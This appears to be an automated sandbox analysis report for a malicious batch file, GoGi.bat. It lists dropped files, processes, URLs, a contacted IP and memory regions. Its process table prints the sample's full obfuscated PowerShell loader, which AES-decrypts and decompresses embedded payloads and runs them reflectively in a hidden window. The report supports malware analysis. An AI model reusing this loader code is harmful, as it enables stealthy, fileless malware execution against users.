Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
GoGi.bat
|
DOS batch file, ASCII text, with very long lines (51202), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kds4ge5.rwg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w30qpleb.b2t.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5j4npm1.sl1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzzcxo2g.m2o.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\MyData\DataLogs.conf
|
ASCII text
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with very long lines (2137), with CRLF line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\GoGi.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\GoGi.bat"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn',
''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR',
''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO',
''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh',
''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm',
''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function
SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object
System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ
(oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk,
6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null);
"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 4 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.222.96.114
|
unknown
|
Germany
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
|
Version
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
1F25FF0B000
|
heap
|
page read and write
|
||
|
1F271E60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1F27A228000
|
heap
|
page read and write
|
||
|
9D0FE7E000
|
stack
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
1F2622C8000
|
trusted library allocation
|
page read and write
|
||
|
9D0F99E000
|
stack
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
9D10079000
|
stack
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1F26347F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F27A016000
|
heap
|
page read and write
|
||
|
9D1017F000
|
stack
|
page read and write
|
||
|
1F261E51000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
1F27A220000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
1F2600E5000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
9D10C4F000
|
stack
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
1F25FF2A000
|
heap
|
page read and write
|
||
|
1F261CD0000
|
trusted library allocation
|
page read and write
|
||
|
1F272013000
|
trusted library allocation
|
page read and write
|
||
|
9D100FE000
|
stack
|
page read and write
|
||
|
1F27A2A4000
|
heap
|
page read and write
|
||
|
1F263A6F000
|
trusted library allocation
|
page read and write
|
||
|
1F279F60000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
1F279F95000
|
heap
|
page read and write
|
||
|
1F27A27B000
|
heap
|
page read and write
|
||
|
1F25FF54000
|
heap
|
page read and write
|
||
|
1F279E5A000
|
heap
|
page read and write
|
||
|
9D101FE000
|
stack
|
page read and write
|
||
|
1F271EC1000
|
trusted library allocation
|
page read and write
|
||
|
1F260040000
|
trusted library allocation
|
page read and write
|
||
|
1F261D00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F25FEE0000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1F260080000
|
trusted library allocation
|
page read and write
|
||
|
1F262D92000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
1F2618B6000
|
heap
|
page read and write
|
||
|
9D1027B000
|
stack
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
1F25FF06000
|
heap
|
page read and write
|
||
|
1F2639E9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1F27A2E4000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
1F279FB1000
|
heap
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
1F260060000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
1F271ECD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7DF463F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
1F25FEEC000
|
heap
|
page read and write
|
||
|
1F279FC6000
|
heap
|
page read and write
|
||
|
1F25FF0E000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
1F271E51000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
1F263825000
|
trusted library allocation
|
page read and write
|
||
|
1F27A232000
|
heap
|
page read and write
|
||
|
1F279FA6000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
1F27A090000
|
heap
|
page execute and read and write
|
||
|
1F25FF28000
|
heap
|
page read and write
|
||
|
1F25FEB0000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
1F27A210000
|
heap
|
page read and write
|
||
|
1F261ED9000
|
trusted library allocation
|
page read and write
|
||
|
1F27A03F000
|
heap
|
page read and write
|
||
|
9D0FD7F000
|
stack
|
page read and write
|
||
|
1F262392000
|
trusted library allocation
|
page read and write
|
||
|
1F25FDB0000
|
heap
|
page read and write
|
||
|
1F263829000
|
trusted library allocation
|
page read and write
|
||
|
1F261E40000
|
heap
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F27A2A1000
|
heap
|
page read and write
|
||
|
1F2600E8000
|
heap
|
page read and write
|
||
|
1F263481000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F271EDD000
|
trusted library allocation
|
page read and write
|
||
|
9D0FEF9000
|
stack
|
page read and write
|
||
|
1F25FFF0000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F260070000
|
heap
|
page readonly
|
||
|
9D0FC7E000
|
stack
|
page read and write
|
||
|
1F261D40000
|
heap
|
page execute and read and write
|
||
|
9D0FF77000
|
stack
|
page read and write
|
||
|
9D0F91E000
|
unkown
|
page read and write
|
||
|
1F279FC8000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
1F263A14000
|
trusted library allocation
|
page read and write
|
||
|
1F27A0F0000
|
heap
|
page execute and read and write
|
||
|
1F260035000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
1F26200E000
|
trusted library allocation
|
page read and write
|
||
|
1F2600E0000
|
heap
|
page read and write
|
||
|
1F27A0F7000
|
heap
|
page execute and read and write
|
||
|
9D0FDFE000
|
stack
|
page read and write
|
||
|
1F261890000
|
heap
|
page read and write
|
||
|
1F26238E000
|
trusted library allocation
|
page read and write
|
||
|
1F262231000
|
trusted library allocation
|
page read and write
|
||
|
9D0F893000
|
stack
|
page read and write
|
||
|
1F279FBB000
|
heap
|
page read and write
|
||
|
1F262135000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1F279F6A000
|
heap
|
page read and write
|
||
|
1F27A26B000
|
heap
|
page read and write
|
||
|
1F260030000
|
heap
|
page read and write
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
9D0F9DE000
|
stack
|
page read and write
|
||
|
9D0FFF9000
|
stack
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
9D0FCFD000
|
stack
|
page read and write
|
||
|
1F27214A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F27A05E000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1F2618B8000
|
heap
|
page read and write
|
||
|
1F262233000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F25FE90000
|
heap
|
page read and write
|
There are 141 hidden memdumps, click here to show them.